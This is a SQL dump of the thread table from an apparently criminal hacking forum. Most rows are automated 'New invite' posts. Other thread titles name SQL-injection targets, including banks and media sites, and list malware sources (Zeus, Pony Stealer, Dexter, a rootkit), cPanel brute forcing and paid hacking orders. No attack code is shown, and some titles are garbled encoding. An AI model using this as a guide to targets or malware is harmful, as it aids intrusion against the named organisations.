`lastpost` int(10) unsigned NOT NULL DEFAULT '0',
`forumid` smallint(5) unsigned NOT NULL DEFAULT '0',
`pollid` int(10) unsigned NOT NULL DEFAULT '0',
`open` smallint(6) NOT NULL DEFAULT '0',
`replycount` int(10) unsigned NOT NULL DEFAULT '0',
`hiddencount` int(10) unsigned NOT NULL DEFAULT '0',
`deletedcount` int(10) unsigned NOT NULL DEFAULT '0',
`postusername` varchar(100) NOT NULL DEFAULT '',
`postuserid` int(10) unsigned NOT NULL DEFAULT '0',
`lastposter` varchar(100) NOT NULL DEFAULT '',
`dateline` int(10) unsigned NOT NULL DEFAULT '0',
`views` int(10) unsigned NOT NULL DEFAULT '0',
`iconid` smallint(5) unsigned NOT NULL DEFAULT '0',
`notes` varchar(250) NOT NULL DEFAULT '',
`visible` smallint(6) NOT NULL DEFAULT '0',
`sticky` smallint(6) NOT NULL DEFAULT '0',
`votenum` smallint(5) unsigned NOT NULL DEFAULT '0',
`votetotal` smallint(5) unsigned NOT NULL DEFAULT '0',
`attach` smallint(5) unsigned NOT NULL DEFAULT '0',
`similar` varchar(55) NOT NULL DEFAULT '',
`taglist` mediumtext,
PRIMARY KEY (`threadid`),
KEY `postuserid` (`postuserid`),
KEY `pollid` (`pollid`),
KEY `forumid` (`forumid`,`visible`,`sticky`,`lastpost`),
KEY `lastpost` (`lastpost`,`forumid`),
KEY `dateline` (`dateline`),
KEY `prefixid` (`prefixid`,`forumid`)
) ENGINE=MyISAM DEFAULT CHARSET=latin1;
INSERT INTO `thread` (`threadid`, `title`, `prefixid`, `firstpostid`, `lastpostid`, `lastpost`, `forumid`, `pollid`, `open`, `replycount`, `hiddencount`, `deletedcount`, `postusername`, `postuserid`, `lastposter`, `dateline`, `views`, `iconid`, `notes`, `visible`, `sticky`, `votenum`, `votetotal`, `attach`, `similar`, `taglist`) VALUES
(9, 'New invite', '', 9, 9, 1401030928, 2, 0, 1, 0, 0, 0, 'w0rm', 1, 'w0rm', 1401030928, 33, 0, '', 1, 0, 0, 0, 0, '', NULL),
(10, 'New invite', '', 10, 10, 1401064661, 2, 0, 1, 0, 0, 0, 'Invite', 2, 'Invite', 1401064661, 24, 0, '', 1, 0, 0, 0, 0, '', NULL),
(12, 'New invite', '', 12, 12, 1401078804, 2, 0, 1, 0, 0, 0, 'Invite', 2, 'Invite', 1401078804, 23, 0, '', 1, 0, 0, 0, 0, '', NULL),
(13, 'New invite', '', 13, 13, 1401093533, 2, 0, 1, 0, 0, 0, 'Invite', 2, 'Invite', 1401093533, 20, 0, '', 1, 0, 0, 0, 0, '', NULL),
(999, 'New invite', '', 1001, 1001, 1402098764, 2, 0, 1, 0, 0, 0, 'Invite', 2, 'Invite', 1402098764, 10, 0, '', 1, 0, 0, 0, 0, '', NULL),
(1057, '[src]RDPammyy evil1.0', '', 1063, 2994, 1455212696, 15, 0, 1, 2, 0, 0, 'w0rm', 1, 'tdss', 1403420217, 115, 0, '', 1, 0, 0, 0, 0, '', NULL),
(1000, 'New invite', '', 1002, 1002, 1402099861, 2, 0, 1, 0, 0, 0, 'Invite', 2, 'Invite', 1402099861, 17, 0, '', 1, 0, 0, 0, 0, '', NULL),
(1001, 'New invite', '', 1003, 1003, 1402223046, 2, 0, 1, 0, 0, 0, 'Invite', 2, 'Invite', 1402223046, 15, 0, '', 1, 0, 0, 0, 0, '', NULL),
(1094, 'Bitrix', '', 1149, 1149, 1404104471, 7, 0, 1, 0, 0, 0, 'null', 9, 'null', 1404104471, 48, 0, '', 1, 0, 0, 0, 0, '', NULL),
(1003, 'New invite', '', 1005, 1005, 1402665113, 2, 0, 1, 0, 0, 0, 'Invite', 2, 'Invite', 1402665113, 19, 0, '', 1, 0, 0, 0, 0, '', NULL),
(1004, 'New invite', '', 1006, 1006, 1402744678, 2, 0, 1, 0, 0, 0, 'Invite', 2, 'Invite', 1402744678, 13, 0, '', 1, 0, 0, 0, 0, '', NULL),
(1005, 'New invite', '', 1007, 1007, 1402769708, 2, 0, 1, 0, 0, 0, 'Invite', 2, 'Invite', 1402769708, 17, 0, '', 1, 0, 0, 0, 0, '', NULL),
(1096, '?? ?????Â?????.', '', 1155, 1729, 1408556494, 7, 0, 1, 1, 0, 0, 'Kingbeef', 3, 'w0rm', 1404145216, 54, 0, '', 1, 0, 0, 0, 0, '', NULL),
(1093, 'New invite', '', 1142, 1165, 1404164681, 2, 0, 1, 6, 0, 0, 'Invite', 2, 'syslink', 1404050514, 47, 0, '', 1, 0, 0, 0, 0, '', NULL),
(1092, 'coru.in (coru.ws)', '', 1141, 2942, 1449432404, 37, 0, 1, 4, 3, 0, 'admin', 1, 'baltazar', 1404040431, 874, 0, '', 1, 0, 0, 0, 0, '', NULL),
(1010, 'New invite', '', 1012, 1012, 1403276397, 2, 0, 1, 0, 0, 0, 'Invite', 2, 'Invite', 1403276397, 18, 0, '', 1, 0, 0, 0, 0, '', NULL),
(1011, 'etxt.ru [deep blind sql-inj]', '', 1013, 1013, 1403310767, 6, 0, 1, 0, 0, 0, 'w0rm', 1, 'w0rm', 1403310767, 3, 0, '', 1, 0, 0, 0, 0, '', NULL),
(1012, 'about', '', 1014, 1014, 1403311001, 6, 0, 1, 0, 0, 0, 'w0rm', 1, 'w0rm', 1403311001, 3, 0, '', 1, 1, 0, 0, 0, '', NULL),
(1054, 'leakforums.org', '', 1060, 1060, 1403418439, 7, 0, 1, 0, 0, 0, 'w0rm', 1, 'w0rm', 1403418439, 45, 0, '', 0, 0, 0, 0, 0, '', NULL),
(1053, '[SQLi] lk.domru.ru', '', 1059, 1059, 1403417910, 7, 0, 1, 0, 0, 0, 'w0rm', 1, 'w0rm', 1403417910, 25, 0, '', 0, 0, 0, 0, 0, '', NULL),
(1015, 'hackers&carders forums', '', 1017, 2901, 1446419208, 10, 0, 1, 8, 0, 0, 'w0rm', 1, 'ponypwpw', 1403312657, 443, 0, '', 1, 0, 0, 0, 0, '', NULL),
(1016, 'sberbank', '', 1018, 1780, 1408909747, 9, 0, 1, 1, 0, 0, 'w0rm', 1, 'opensc', 1403313958, 133, 0, '', 1, 0, 0, 0, 0, '', NULL),
(1017, 'Cve-2014-0322', '', 1020, 1781, 1408910207, 9, 0, 1, 1, 0, 0, 'w0rm', 1, 'opensc', 1403322294, 104, 0, '', 1, 0, 0, 0, 0, '', NULL),
(1018, 'OpenSSH rootkit backdoor tool with ssh sniffer', '', 1021, 1592, 1408104457, 9, 0, 1, 1, 0, 0, 'sniffer', 5, '123', 1403334206, 117, 1, '', 1, 0, 0, 0, 0, '', NULL),
(1021, 'src fbot', '', 1024, 1024, 1403402926, 15, 0, 1, 0, 0, 0, 'w0rm', 1, 'w0rm', 1403402926, 54, 0, '', 1, 0, 0, 0, 0, '', NULL),
(1022, 'Read.Me', '', 1025, 1025, 1403404742, 13, 0, 1, 0, 0, 0, 'w0rm', 1, 'w0rm', 1403404742, 72, 0, '', 1, 1, 0, 0, 0, '', NULL),
(1025, 'gazavat', '', 1028, 2985, 1453649532, 15, 0, 1, 5, 0, 0, 'w0rm', 1, 'tdss', 1403406679, 155, 0, '', 1, 0, 0, 0, 0, '', NULL),
(1026, 'milw0rm', '', 1029, 3032, 1458689624, 15, 0, 1, 6, 0, 0, 'w0rm', 1, 'tdss', 1403406958, 243, 0, '', 1, 0, 0, 0, 0, '', NULL),
(1027, 'Qiwi', '', 1030, 1138, 1403924615, 7, 0, 1, 1, 0, 0, 'w0rm', 1, 'w0rm', 1403408416, 96, 0, '', 1, 0, 0, 0, 0, '', NULL),
(1030, 'FuckAV.ru [private]', '', 1033, 1033, 1403408824, 37, 0, 1, 0, 0, 0, 'w0rm', 1, 'w0rm', 1403408824, 764, 0, '', 1, 0, 0, 0, 0, '', NULL),
(1031, 'OpenSC.ws', '', 1034, 1034, 1403408894, 37, 0, 1, 0, 0, 0, 'w0rm', 1, 'w0rm', 1403408894, 568, 0, '', 1, 0, 0, 0, 0, '', NULL),
(1032, 'Joomla.RU', '', 1035, 1035, 1403409115, 7, 0, 1, 0, 0, 0, 'w0rm', 1, 'w0rm', 1403409115, 30, 0, '', 0, 0, 0, 0, 0, '', NULL),
(1033, 'G-Bot Killer', '', 1036, 1071, 1403474386, 15, 0, 1, 2, 0, 0, 'w0rm', 1, 'w0rm', 1403409249, 47, 0, '', 1, 0, 0, 0, 0, '', NULL),
(1035, 'ppt.ru [sql-inj]', '', 1038, 1038, 1403409441, 7, 0, 1, 0, 0, 0, 'w0rm', 1, 'w0rm', 1403409441, 31, 0, '', 0, 0, 0, 0, 0, '', NULL),
(1036, '[SQL+shell] uniBank Ghana', '', 1039, 1039, 1403409613, 7, 0, 1, 0, 0, 0, 'w0rm', 1, 'w0rm', 1403409613, 35, 0, '', 0, 0, 0, 0, 0, '', NULL),
(1037, 'hostinger.ru/auth', '', 1040, 1044, 1403410267, 7, 0, 1, 3, 0, 0, 'w0rm', 1, 'w0rm', 1403409811, 42, 0, '', 0, 0, 0, 0, 0, '', NULL),
(1038, 'rog.asus.com', '', 1043, 2984, 1453533442, 7, 0, 1, 1, 0, 0, 'admin', 1, 'w0rm', 1403410139, 50, 0, '', 0, 0, 0, 0, 0, '', NULL),
(1039, 'ftp\'s', '', 1045, 1045, 1403410367, 7, 0, 1, 0, 0, 0, 'w0rm', 1, 'w0rm', 1403410367, 147, 0, '', 1, 1, 0, 0, 0, '', NULL),
(1040, 'alfabank.com.ua [sql-inj]', '', 1046, 1046, 1403410427, 7, 0, 1, 0, 0, 0, 'w0rm', 1, 'w0rm', 1403410427, 43, 0, '', 0, 0, 0, 0, 0, '', NULL),
(1041, 'Wordpress like-dislike-counter-for-posts-pages-and-comments plugin SqlInjection', '', 1047, 1047, 1403410709, 7, 0, 1, 0, 0, 0, 'w0rm', 1, 'w0rm', 1403410709, 20, 0, '', 0, 0, 0, 0, 0, '', NULL),
(1042, '[sql-inj] com_jvideoclip Joomla', '', 1048, 1048, 1403410794, 7, 0, 1, 0, 0, 0, 'w0rm', 1, 'w0rm', 1403410794, 18, 0, '', 0, 0, 0, 0, 0, '', NULL),
(1043, '???? ????????', '', 1049, 1049, 1403410906, 7, 0, 1, 0, 0, 0, 'w0rm', 1, 'w0rm', 1403410906, 40, 0, '', 0, 0, 0, 0, 0, '', NULL),
(1044, 'Community-Now! Data Becker', '', 1050, 1050, 1403411010, 7, 0, 1, 0, 0, 0, 'w0rm', 1, 'w0rm', 1403411010, 24, 0, '', 0, 0, 0, 0, 0, '', NULL),
(1045, 'rg.ru', '', 1051, 1051, 1403411109, 7, 0, 1, 0, 0, 0, 'w0rm', 1, 'w0rm', 1403411109, 65, 0, '', 0, 0, 0, 0, 0, '', NULL),
(1046, 'SQLi - RUTV; HitFM; DFM;', '', 1052, 1052, 1403411238, 7, 0, 1, 0, 0, 0, 'w0rm', 1, 'w0rm', 1403411238, 28, 0, '', 0, 0, 0, 0, 0, '', NULL),
(1048, '??????? ??????? WordPress', '', 1054, 1054, 1403411422, 7, 0, 1, 0, 0, 0, 'w0rm', 1, 'w0rm', 1403411422, 24, 0, '', 0, 0, 0, 0, 0, '', NULL),
(1049, 'Þýûðùý þñüõýýøú', '', 1055, 1055, 1403411503, 7, 0, 1, 0, 0, 0, 'w0rm', 1, 'w0rm', 1403411503, 33, 0, '', 0, 0, 0, 0, 0, '', NULL),
(1050, 'kinospisok.ru', '', 1056, 1065, 1403428852, 7, 0, 1, 1, 0, 0, 'w0rm', 1, 'Kingbeef', 1403411561, 42, 0, '', 0, 0, 0, 0, 0, '', NULL),
(1051, 'ipcheker httpd.conf', '', 1057, 1057, 1403411721, 16, 0, 1, 0, 0, 0, 'w0rm', 1, 'w0rm', 1403411721, 55, 0, '', 1, 0, 0, 0, 0, '', NULL),
(1052, 'Брут сPanel', '', 1058, 1058, 1403411805, 16, 0, 1, 0, 0, 0, 'w0rm', 1, 'w0rm', 1403411805, 76, 0, '', 1, 0, 0, 0, 0, '', NULL),
(992, 'New invite', '', 994, 994, 1401988883, 2, 0, 1, 0, 0, 0, 'Invite', 2, 'Invite', 1401988883, 7, 0, '', 1, 0, 0, 0, 0, '', NULL),
(567, 'New invite', '', 567, 567, 1401128941, 2, 0, 1, 0, 0, 0, 'Invite', 2, 'Invite', 1401128941, 21, 0, '', 1, 0, 0, 0, 0, '', NULL),
(996, 'New invite', '', 998, 998, 1401989287, 2, 0, 1, 0, 0, 0, 'Invite', 2, 'Invite', 1401989287, 23, 0, '', 1, 0, 0, 0, 0, '', NULL),
(578, 'New invite', '', 578, 578, 1401244951, 2, 0, 1, 0, 0, 0, 'Invite', 2, 'Invite', 1401244951, 12, 0, '', 1, 0, 0, 0, 0, '', NULL),
(577, 'New invite', '', 577, 577, 1401244497, 2, 0, 1, 0, 0, 0, 'Invite', 2, 'Invite', 1401244497, 11, 0, '', 1, 0, 0, 0, 0, '', NULL),
(993, 'New invite', '', 995, 995, 1401989064, 2, 0, 1, 0, 0, 0, 'Invite', 2, 'Invite', 1401989064, 6, 0, '', 1, 0, 0, 0, 0, '', NULL),
(575, 'New invite', '', 575, 575, 1401215813, 2, 0, 1, 0, 0, 0, 'Invite', 2, 'Invite', 1401215813, 14, 0, '', 1, 0, 0, 0, 0, '', NULL),
(574, 'New invite', '', 574, 574, 1401213750, 2, 0, 1, 0, 0, 0, 'Invite', 2, 'Invite', 1401213750, 11, 0, '', 1, 0, 0, 0, 0, '', NULL),
(573, 'New invite', '', 573, 573, 1401213499, 2, 0, 1, 0, 0, 0, 'Invite', 2, 'Invite', 1401213499, 13, 0, '', 1, 0, 0, 0, 0, '', NULL),
(995, 'New invite', '', 997, 997, 1401989159, 2, 0, 1, 0, 0, 0, 'Invite', 2, 'Invite', 1401989159, 10, 0, '', 1, 0, 0, 0, 0, '', NULL),
(570, 'New invite', '', 570, 570, 1401165970, 2, 0, 1, 0, 0, 0, 'Invite', 2, 'Invite', 1401165970, 16, 0, '', 1, 0, 0, 0, 0, '', NULL),
(572, 'New invite', '', 572, 572, 1401198598, 2, 0, 1, 0, 0, 0, 'Invite', 2, 'Invite', 1401198598, 16, 0, '', 1, 0, 0, 0, 0, '', NULL),
(994, 'New invite', '', 996, 996, 1401989102, 2, 0, 1, 0, 0, 0, 'Invite', 2, 'Invite', 1401989102, 7, 0, '', 1, 0, 0, 0, 0, '', NULL),
(978, 'New invite', '', 979, 979, 1401712607, 2, 0, 1, 0, 0, 0, 'Invite', 2, 'Invite', 1401712607, 17, 0, '', 1, 0, 0, 0, 0, '', NULL),
(979, 'New invite', '', 980, 980, 1401714082, 2, 0, 1, 0, 0, 0, 'Invite', 2, 'Invite', 1401714082, 20, 0, '', 1, 0, 0, 0, 0, '', NULL),
(980, 'ßрðòøûð.', '', 982, 982, 1401725665, 13, 0, 1, 0, 0, 0, 'w0rm', 1, 'w0rm', 1401725665, 99, 0, '', 1, 1, 0, 0, 0, '', NULL),
(981, 'New invite', '', 983, 983, 1401728263, 2, 0, 1, 0, 0, 0, 'Invite', 2, 'Invite', 1401728263, 21, 0, '', 1, 0, 0, 0, 0, '', NULL),
(984, 'Þрóðýø÷ðцøþýýыõ ôõûð.', '', 986, 986, 1401824546, 13, 0, 1, 0, 0, 0, 'w0rm', 1, 'w0rm', 1401824546, 60, 0, '', 1, 1, 0, 0, 0, '', NULL),
(1091, 'New invite', '', 1139, 1139, 1403988237, 2, 0, 1, 0, 0, 0, 'Invite', 2, 'Invite', 1403988237, 18, 0, '', 1, 0, 0, 0, 0, '', NULL),
(1089, 'SQl inj .DK domain', '', 1127, 1163, 1404154995, 7, 0, 1, 6, 0, 0, 'null', 9, 'Psych0tr1a', 1403855906, 115, 0, '', 1, 0, 0, 0, 1, '', NULL),
(1061, 'fbooka.com', '', 1068, 1068, 1403466211, 7, 0, 1, 0, 0, 0, 'w0rm', 1, 'w0rm', 1403466211, 28, 0, '', 0, 0, 0, 0, 0, '', NULL),
(1063, 'code_exec чõрõ÷ SQLi', '', 1072, 1722, 1408533325, 7, 0, 1, 8, 0, 0, 'w0rm', 1, 'Psych0tr1a', 1403494218, 121, 0, '', 1, 0, 0, 0, 0, '', NULL),
(1062, '[Ruby] LFI via phpinfo() exploit', '', 1070, 1070, 1403473503, 16, 0, 1, 0, 0, 0, 'Psych0tr1a', 11, 'Psych0tr1a', 1403473503, 95, 0, '', 1, 0, 0, 0, 1, '', NULL),
(1064, 'заказы', '', 1073, 2252, 1427703876, 7, 0, 1, 27, 0, 0, 'w0rm', 1, 'w0rm', 1403494841, 857, 0, '', 1, 1, 0, 0, 0, '', NULL),
(1065, 'Isfb', '', 1083, 1083, 1403525179, 15, 0, 1, 0, 0, 0, 'skiffha', 10, 'skiffha', 1403525179, 36, 0, '', 1, 0, 0, 0, 0, '', NULL),
(1066, 'Pony Stealer', '', 1084, 1084, 1403525482, 15, 0, 1, 0, 0, 0, 'skiffha', 10, 'skiffha', 1403525482, 49, 0, '', 1, 0, 0, 0, 0, '', NULL),
(1067, 'Thaimail.com LFI + [2]SQLi', '', 1086, 1764, 1408803863, 7, 0, 1, 7, 0, 0, 'Psych0tr1a', 11, '123', 1403526888, 126, 0, '', 1, 0, 0, 0, 0, '', NULL),
(1068, 'Inbox.uz SQLi + src disclosure + mini bug', '', 1087, 1087, 1403527275, 7, 0, 1, 0, 0, 0, 'Psych0tr1a', 11, 'Psych0tr1a', 1403527275, 35, 0, '', 1, 0, 0, 0, 0, '', NULL),
(1069, 'Gde.ru SQLi', '', 1091, 1091, 1403527726, 7, 0, 1, 0, 0, 0, 'Psych0tr1a', 11, 'Psych0tr1a', 1403527726, 32, 0, '', 1, 0, 0, 0, 0, '', NULL),
(1070, 'freemail.uz SQLi', '', 1094, 1094, 1403528255, 7, 0, 1, 0, 0, 0, 'Psych0tr1a', 11, 'Psych0tr1a', 1403528255, 30, 0, '', 1, 0, 0, 0, 0, '', NULL),
(1071, 'Krypton', '', 1095, 1095, 1403528284, 15, 0, 1, 0, 0, 0, 'skiffha', 10, 'skiffha', 1403528284, 45, 0, '', 1, 0, 0, 0, 0, '', NULL),
(1072, 'Dexter 1-2', '', 1098, 1098, 1403529985, 15, 0, 1, 0, 0, 0, 'skiffha', 10, 'skiffha', 1403529985, 42, 0, '', 1, 0, 0, 0, 0, '', NULL),
(1073, 'K.i.n.s 1.0.2.0', '', 1099, 1099, 1403533967, 15, 0, 1, 0, 0, 0, 'skiffha', 10, 'skiffha', 1403533967, 48, 0, '', 1, 0, 0, 0, 0, '', NULL),
(1074, 'Zeus All version and modification', '', 1100, 1100, 1403534333, 15, 0, 1, 0, 0, 0, 'skiffha', 10, 'skiffha', 1403534333, 60, 0, '', 1, 0, 0, 0, 0, '', NULL),
(1075, 'PowerLoader', '', 1101, 1101, 1403534507, 15, 0, 1, 0, 0, 0, 'skiffha', 10, 'skiffha', 1403534507, 42, 0, '', 1, 0, 0, 0, 0, '', NULL),
(1076, 'Android bot Stoned Cat', '', 1102, 1102, 1403536317, 15, 0, 1, 0, 0, 0, 'skiffha', 10, 'skiffha', 1403536317, 74, 0, '', 1, 0, 0, 0, 0, '', NULL),
(1077, 'hermes aka tatanga', '', 1106, 1106, 1403539034, 15, 0, 1, 0, 0, 0, 'skiffha', 10, 'skiffha', 1403539034, 74, 0, '', 1, 0, 0, 0, 0, '', NULL),
(969, 'New invite', '', 970, 970, 1401643211, 2, 0, 1, 0, 0, 0, 'Invite', 2, 'Invite', 1401643211, 19, 0, '', 1, 0, 0, 0, 0, '', NULL),
(988, 'New invite', '', 990, 990, 1401974407, 2, 0, 1, 0, 0, 0, 'Invite', 2, 'Invite', 1401974407, 7, 0, '', 1, 0, 0, 0, 0, '', NULL),
(987, 'New invite', '', 989, 989, 1401974405, 2, 0, 1, 0, 0, 0, 'Invite', 2, 'Invite', 1401974405, 10, 0, '', 1, 0, 0, 0, 0, '', NULL),
(989, 'New invite', '', 991, 991, 1401974412, 2, 0, 1, 0, 0, 0, 'Invite', 2, 'Invite', 1401974412, 10, 0, '', 1, 0, 0, 0, 0, '', NULL),
(972, 'New invite', '', 973, 973, 1401656296, 2, 0, 1, 0, 0, 0, 'Invite', 2, 'Invite', 1401656296, 15, 0, '', 1, 0, 0, 0, 0, '', NULL),
(1019, 'New invite', '', 1022, 1022, 1403342757, 2, 0, 1, 0, 0, 0, 'Invite', 2, 'Invite', 1403342757, 17, 0, '', 1, 0, 0, 0, 0, '', NULL),
(974, 'New invite', '', 975, 975, 1401680435, 2, 0, 1, 0, 0, 0, 'Invite', 2, 'Invite', 1401680435, 14, 0, '', 1, 0, 0, 0, 0, '', NULL),
(966, 'New invite', '', 967, 967, 1401633486, 2, 0, 1, 0, 0, 0, 'Invite', 2, 'Invite', 1401633486, 13, 0, '', 1, 0, 0, 0, 0, '', NULL),
(916, 'New invite', '', 916, 916, 1401336639, 2, 0, 1, 0, 0, 0, 'Invite', 2, 'Invite', 1401336639, 16, 0, '', 1, 0, 0, 0, 0, '', NULL),
(917, 'New invite', '', 917, 917, 1401336674, 2, 0, 1, 0, 0, 0, 'Invite', 2, 'Invite', 1401336674, 15, 0, '', 1, 0, 0, 0, 0, '', NULL),
(919, 'New invite', '', 919, 919, 1401342899, 2, 0, 1, 0, 0, 0, 'Invite', 2, 'Invite', 1401342899, 17, 0, '', 1, 0, 0, 0, 0, '', NULL),
(961, 'New invite', '', 962, 962, 1401623938, 2, 0, 1, 0, 0, 0, 'Invite', 2, 'Invite', 1401623938, 15, 0, '', 1, 0, 0, 0, 0, '', NULL),
(921, 'New invite', '', 921, 921, 1401346008, 2, 0, 1, 0, 0, 0, 'Invite', 2, 'Invite', 1401346008, 22, 0, '', 1, 0, 0, 0, 0, '', NULL),
(922, 'New invite', '', 922, 922, 1401346447, 2, 0, 1, 0, 0, 0, 'Invite', 2, 'Invite', 1401346447, 17, 0, '', 1, 0, 0, 0, 0, '', NULL),
(923, 'New invite', '', 923, 923, 1401348770, 2, 0, 1, 0, 0, 0, 'Invite', 2, 'Invite', 1401348770, 17, 0, '', 1, 0, 0, 0, 0, '', NULL),
(991, 'New invite', '', 993, 993, 1401988660, 2, 0, 1, 0, 0, 0, 'Invite', 2, 'Invite', 1401988660, 9, 0, '', 1, 0, 0, 0, 0, '', NULL),
(968, 'New invite', '', 969, 969, 1401639433, 2, 0, 1, 0, 0, 0, 'Invite', 2, 'Invite', 1401639433, 14, 0, '', 1, 0, 0, 0, 0, '', NULL),
(926, 'New invite', '', 926, 926, 1401381777, 2, 0, 1, 0, 0, 0, 'Invite', 2, 'Invite', 1401381777, 14, 0, '', 1, 0, 0, 0, 0, '', NULL),
(927, 'New invite', '', 927, 927, 1401384050, 2, 0, 1, 0, 0, 0, 'Invite', 2, 'Invite', 1401384050, 20, 0, '', 1, 0, 0, 0, 0, '', NULL),
(928, 'New invite', '', 928, 928, 1401390423, 2, 0, 1, 0, 0, 0, 'Invite', 2, 'Invite', 1401390423, 17, 0, '', 1, 0, 0, 0, 0, '', NULL),
(965, 'New invite', '', 966, 966, 1401633335, 2, 0, 1, 0, 0, 0, 'Invite', 2, 'Invite', 1401633335, 13, 0, '', 1, 0, 0, 0, 0, '', NULL),
(990, 'New invite', '', 992, 992, 1401978376, 2, 0, 1, 0, 0, 0, 'Invite', 2, 'Invite', 1401978376, 11, 0, '', 1, 0, 0, 0, 0, '', NULL),
(962, 'New invite', '', 963, 963, 1401624142, 2, 0, 1, 0, 0, 0, 'Invite', 2, 'Invite', 1401624142, 11, 0, '', 1, 0, 0, 0, 0, '', NULL),
(964, 'New invite', '', 965, 965, 1401628090, 2, 0, 1, 0, 0, 0, 'Invite', 2, 'Invite', 1401628090, 14, 0, '', 1, 0, 0, 0, 0, '', NULL),
(930, 'New invite', '', 930, 930, 1401412714, 2, 0, 1, 0, 0, 0, 'Invite', 2, 'Invite', 1401412714, 22, 0, '', 1, 0, 0, 0, 0, '', NULL),
(931, 'New invite', '', 931, 931, 1401412763, 2, 0, 1, 0, 0, 0, 'Invite', 2, 'Invite', 1401412763, 17, 0, '', 1, 0, 0, 0, 0, '', NULL),
(932, 'New invite', '', 932, 932, 1401412996, 2, 0, 1, 0, 0, 0, 'Invite', 2, 'Invite', 1401412996, 16, 0, '', 1, 0, 0, 0, 0, '', NULL),
(933, 'New invite', '', 933, 933, 1401431371, 2, 0, 1, 0, 0, 0, 'Invite', 2, 'Invite', 1401431371, 15, 0, '', 1, 0, 0, 0, 0, '', NULL),
(955, 'New invite', '', 956, 956, 1401598131, 2, 0, 1, 0, 0, 0, 'Invite', 2, 'Invite', 1401598131, 16, 0, '', 1, 0, 0, 0, 0, '', NULL),
(937, 'New invite', '', 938, 938, 1401473259, 2, 0, 1, 0, 0, 0, 'Invite', 2, 'Invite', 1401473259, 15, 0, '', 1, 0, 0, 0, 0, '', NULL),
(954, 'New invite', '', 955, 955, 1401585919, 2, 0, 1, 0, 0, 0, 'Invite', 2, 'Invite', 1401585919, 13, 0, '', 1, 0, 0, 0, 0, '', NULL),
(938, 'New invite', '', 939, 939, 1401475724, 2, 0, 1, 0, 0, 0, 'Invite', 2, 'Invite', 1401475724, 20, 0, '', 1, 0, 0, 0, 0, '', NULL),
(939, 'New invite', '', 940, 940, 1401546324, 2, 0, 1, 0, 0, 0, 'Invite', 2, 'Invite', 1401546324, 11, 0, '', 1, 0, 0, 0, 0, '', NULL),
(953, 'New invite', '', 954, 954, 1401585377, 2, 0, 1, 0, 0, 0, 'Invite', 2, 'Invite', 1401585377, 12, 0, '', 1, 0, 0, 0, 0, '', NULL),
(941, 'New invite', '', 942, 942, 1401559552, 2, 0, 1, 0, 0, 0, 'Invite', 2, 'Invite', 1401559552, 15, 0, '', 1, 0, 0, 0, 0, '', NULL),
(942, 'New invite', '', 943, 943, 1401559638, 2, 0, 1, 0, 0, 0, 'Invite', 2, 'Invite', 1401559638, 17, 0, '', 1, 0, 0, 0, 0, '', NULL),
(943, 'New invite', '', 944, 944, 1401559677, 2, 0, 1, 0, 0, 0, 'Invite', 2, 'Invite', 1401559677, 13, 0, '', 1, 0, 0, 0, 0, '', NULL),
(945, 'New invite', '', 946, 946, 1401562809, 2, 0, 1, 0, 0, 0, 'Invite', 2, 'Invite', 1401562809, 15, 0, '', 1, 0, 0, 0, 0, '', NULL),
(946, 'New invite', '', 947, 947, 1401562832, 2, 0, 1, 0, 0, 0, 'Invite', 2, 'Invite', 1401562832, 15, 0, '', 1, 0, 0, 0, 0, '', NULL),
(947, 'New invite', '', 948, 948, 1401562978, 2, 0, 1, 0, 0, 0, 'Invite', 2, 'Invite', 1401562978, 15, 0, '', 1, 0, 0, 0, 0, '', NULL),
(948, 'New invite', '', 949, 949, 1401563142, 2, 0, 1, 0, 0, 0, 'Invite', 2, 'Invite', 1401563142, 15, 0, '', 1, 0, 0, 0, 0, '', NULL),
(949, 'New invite', '', 950, 950, 1401563845, 2, 0, 1, 0, 0, 0, 'Invite', 2, 'Invite', 1401563845, 18, 0, '', 1, 0, 0, 0, 0, '', NULL),
(950, 'New invite', '', 951, 951, 1401564546, 2, 0, 1, 0, 0, 0, 'Invite', 2, 'Invite', 1401564546, 20, 0, '', 1, 0, 0, 0, 0, '', NULL),
(951, 'New invite', '', 952, 952, 1401564992, 2, 0, 1, 0, 0, 0, 'Invite', 2, 'Invite', 1401564992, 18, 0, '', 1, 0, 0, 0, 0, '', NULL),
(952, 'New invite', '', 953, 953, 1401565042, 2, 0, 1, 0, 0, 0, 'Invite', 2, 'Invite', 1401565042, 18, 0, '', 1, 0, 0, 0, 0, '', NULL),
(1099, 'SSL - https://w0rm.pw', '', 1170, 2109, 1411203918, 13, 0, 1, 3, 0, 0, 'w0rm', 1, 'lumbricus', 1404233847, 112, 0, '', 1, 1, 0, 0, 0, '', NULL),
(1079, 'adagio.com shop SQLi', '', 1115, 1115, 1403721092, 7, 0, 1, 0, 0, 0, 'kx00', 6, 'kx00', 1403721092, 41, 0, '', 1, 0, 0, 0, 0, '', NULL),
(1080, 'Microsoft Remote Desktop Use-After-Free DoS', '', 1116, 1116, 1403721490, 7, 0, 1, 0, 0, 0, 'w0rm', 1, 'w0rm', 1403721490, 22, 0, '', 1, 0, 0, 0, 0, '', NULL),
(1081, 'pay pall [xss]', '', 1117, 1117, 1403721586, 7, 0, 1, 0, 0, 0, 'w0rm', 1, 'w0rm', 1403721586, 56, 0, '', 1, 0, 0, 0, 0, '', NULL),
(1438, '{$name}', '', 1587, 1587, 1407964994, 2, 0, 1, 0, 0, 0, 'Invite', 2, 'Invite', 1407964994, 8, 0, '', 1, 0, 0, 0, 0, '', NULL),
(1083, 'заказы на похек :)', '', 1119, 2146, 1411470934, 7, 0, 1, 40, 0, 1, 'Bo0om', 7, 'awert', 1403793080, 985, 4, '', 1, 1, 0, 0, 0, '', NULL),
(1132, 'New invite', '', 1221, 1221, 1404694277, 2, 0, 1, 0, 0, 0, 'Invite', 2, 'Invite', 1404694277, 8, 0, '', 1, 0, 0, 0, 0, '', NULL),
(1097, 'Vulnerabilities in Australian goverment Bureau of Meteorlogy', '', 1166, 1166, 1404204058, 7, 0, 1, 0, 0, 0, 'Psych0tr1a', 11, 'Psych0tr1a', 1404204058, 55, 0, '', 1, 0, 0, 0, 0, '', NULL),
(1088, 'New invite', '', 1124, 1129, 1403860738, 2, 0, 1, 3, 0, 0, 'Invite', 2, 'w0rm', 1403798959, 40, 0, '', 1, 0, 0, 0, 0, '', NULL),
(1100, 'ãÑÂ÷òøüþÑÂтø ò osCShop Webshop þт osCommerce', '', 1171, 1171, 1404235052, 7, 0, 1, 0, 0, 0, 'Psych0tr1a', 11, 'Psych0tr1a', 1404235052, 48, 0, '', 1, 0, 0, 0, 0, '', NULL),
